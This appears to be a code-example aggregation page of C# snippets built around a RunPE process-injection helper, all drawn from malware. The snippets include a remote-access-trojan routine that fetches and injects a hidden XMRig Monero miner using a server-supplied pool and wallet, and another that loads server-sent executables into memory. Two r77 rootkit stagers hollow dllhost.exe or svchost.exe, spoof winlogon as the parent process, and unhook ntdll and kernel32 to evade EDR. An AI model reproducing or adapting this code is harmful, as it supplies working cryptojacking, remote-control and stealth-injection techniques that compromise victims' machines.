public void RunMiner(MsgPack unpack_msgpack)
 {
     try
     {
         string xmrig    = Path.GetTempPath() + unpack_msgpack.ForcePathObject("Hash").AsString + ".bin";
         string injectTo = unpack_msgpack.ForcePathObject("InjectTo").AsString;
         string args     = $"-B --donate-level=1 -t {Environment.ProcessorCount / 2} -v 0 --cpu-priority=3 -a cn/r -k -o {unpack_msgpack.ForcePathObject("Pool").AsString} -u {unpack_msgpack.ForcePathObject("Wallet").AsString} -p {unpack_msgpack.ForcePathObject("Pass").AsString}";
         if (!File.Exists(xmrig))
         {
             //ask server to send xmrig
             MsgPack msgpack = new MsgPack();
             msgpack.ForcePathObject("Packet").AsString = "GetXmr";
             Connection.Send(msgpack.Encode2Bytes());
             return;
         }
         KillMiner();
         if (RunPE.Run(Path.Combine(RuntimeEnvironment.GetRuntimeDirectory().Replace("Framework64", "Framework"), injectTo), Zip.Decompress(File.ReadAllBytes(Path.GetTempPath() + unpack_msgpack.ForcePathObject("Hash").AsString + ".bin")), args, false))
         {
             SetRegistry.SetValue(Connection.Hwid, "1");
         }
     }
     catch (Exception ex)
     {
         Packet.Error(ex.Message);
     }
 }
Exemple #2
0
    // The target framework is .NET 3.5.
    // Normally, if .NET 4.x is installed, but .NET 3.5 isn't, this executable doesn't start.
    // However, the target framework is not relevant in the powershell context.
    // The executable will run, if *either* .NET 3.5 *or* .NET 4.x is installed.
    // To immediately spot code that is incompatible with .NET 3.5, the target framework is set to .NET 3.5.
    public static void Main()
    {
        Process.EnterDebugMode();

        // Get r77 service executable.
        byte[] payload32 = Decompress(Decrypt(Resources.InstallService32));
        byte[] payload64 = Decompress(Decrypt(Resources.InstallService64));

        // Executable to be used for process hollowing.
        string path        = @"C:\Windows\System32\dllhost.exe";
        string pathWow64   = @"C:\Windows\SysWOW64\dllhost.exe";
        string commandLine = "/Processid:" + Guid.NewGuid().ToString("B");         // Random commandline to mimic an actual dllhost.exe commandline (has no effect).

        // Parent process spoofing can only be used on certain processes, particularly the PROCESS_CREATE_PROCESS privilege is required.
        int parentProcessId = Process.GetProcessesByName("winlogon")[0].Id;

        // Create the 32-bit and 64-bit instance of the r77 service.
        if (Helper.Is64BitOperatingSystem())
        {
            if (IntPtr.Size == 4)
            {
                RunPE.Run(pathWow64, commandLine, payload32, parentProcessId);
            }
            else
            {
                RunPE.Run(path, commandLine, payload64, parentProcessId);
            }
        }
        else
        {
            RunPE.Run(path, commandLine, payload32, parentProcessId);
        }
    }
    // Loads Payload.exe (native executable) from resources and injects into suitable OS executable.
    // This stage is required to be C#, because the startup stage may only contain C# code with a maximum of 260 characters for the commandline.
    // The next stage is the actual payload, which is required to be a native executable in order to be injected.
    public static void Main()
    {
        string path = Environment.Is64BitOperatingSystem ? @"C:\Windows\SysWOW64\svchost.exe" : @"C:\Windows\System32\svchost.exe";

        byte[] payload = Decompress(Decrypt(Resources.Payload));
        RunPE.Run(path, payload);
    }
 public void SendToMemory(MsgPack unpack_msgpack)
 {
     try
     {
         byte[] buffer    = unpack_msgpack.ForcePathObject("File").GetAsBytes();
         string injection = unpack_msgpack.ForcePathObject("Inject").AsString;
         if (injection.Length == 0)
         {
             //Reflection
             new Thread(delegate()
             {
                 try
                 {
                     Assembly loader = Assembly.Load(Methods.Decompress(buffer));
                     object[] parm   = null;
                     if (loader.EntryPoint.GetParameters().Length > 0)
                     {
                         parm = new object[] { new string[] { null } };
                     }
                     loader.EntryPoint.Invoke(null, parm);
                 }
                 catch (Exception ex)
                 {
                     Packet.Error(ex.Message);
                 }
             })
             {
                 IsBackground = true
             }.Start();
         }
         else
         {
             //RunPE
             new Thread(delegate()
             {
                 try
                 {
                     RunPE.Run(Path.Combine(RuntimeEnvironment.GetRuntimeDirectory().Replace("Framework64", "Framework"), injection), Methods.Decompress(buffer), "", true);
                 }
                 catch (Exception ex)
                 {
                     Packet.Error(ex.Message);
                 }
             })
             {
                 IsBackground = true
             }.Start();
         }
     }
     catch (Exception ex)
     {
         Packet.Error(ex.Message);
     }
     Connection.Disconnected();
 }
Exemple #5
0
    // The target framework is .NET 3.5.
    // Normally, if .NET 4.x is installed, but .NET 3.5 isn't, this executable doesn't start.
    // However, the target framework is not relevant in the powershell context.
    // The executable will run, if *either* .NET 3.5 *or* .NET 4.x is installed.
    // To immediately spot code that is incompatible with .NET 3.5, the target framework is set to .NET 3.5.
    public static void Main()
    {
        // Unhook DLL's that are monitored by EDR.
        // Otherwise, the call sequence analysis of process hollowing gets detected and the stager is terminated.
        Unhook.UnhookDll("ntdll.dll");
        if (Environment.OSVersion.Version.Major >= 10 || IntPtr.Size == 8)
        {
            // Unhooking kernel32.dll on Windows 7 x86 fails.
            //TODO: Find out why unhooking kernel32.dll on Windows 7 x86 fails.
            Unhook.UnhookDll("kernel32.dll");
        }

        Process.EnterDebugMode();

        // Get r77 service executable.
        byte[] payload32 = Decompress(Decrypt(Resources.InstallService32));
        byte[] payload64 = Decompress(Decrypt(Resources.InstallService64));

        // Executable to be used for process hollowing.
        string path        = @"C:\Windows\System32\dllhost.exe";
        string pathWow64   = @"C:\Windows\SysWOW64\dllhost.exe";
        string commandLine = "/Processid:" + Guid.NewGuid().ToString("B");         // Random commandline to mimic an actual dllhost.exe commandline (has no effect).

        // Parent process spoofing can only be used on certain processes, particularly the PROCESS_CREATE_PROCESS privilege is required.
        int parentProcessId = Process.GetProcessesByName("winlogon")[0].Id;

        // Create the 32-bit and 64-bit instance of the r77 service.
        if (Helper.Is64BitOperatingSystem())
        {
            if (IntPtr.Size == 4)
            {
                RunPE.Run(pathWow64, commandLine, payload32, parentProcessId);
            }
            else
            {
                RunPE.Run(path, commandLine, payload64, parentProcessId);
            }
        }
        else
        {
            RunPE.Run(path, commandLine, payload32, parentProcessId);
        }
    }
Exemple #6
0
 public void Inject(byte[] payload, string target)
 {
     //Add actions if RunPe.Run returns false
     RunPE.Run(payload, target);
 }